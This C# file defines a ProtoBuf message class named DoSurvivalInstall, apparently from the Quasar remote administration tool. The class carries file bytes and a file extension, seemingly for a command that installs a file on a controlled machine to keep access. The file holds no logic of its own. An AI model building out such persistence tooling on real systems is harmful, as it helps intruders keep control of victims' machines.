using ProtoBuf;

namespace Quasar.Common.Messages
{
    [ProtoContract]
    public class DoSurvivalInstall : IMessage
    {
        [ProtoMember(1)]
        public byte[] FileBytes { get; set; }

        [ProtoMember(2)]
        public string FileExtension { get; set; }
    }
}
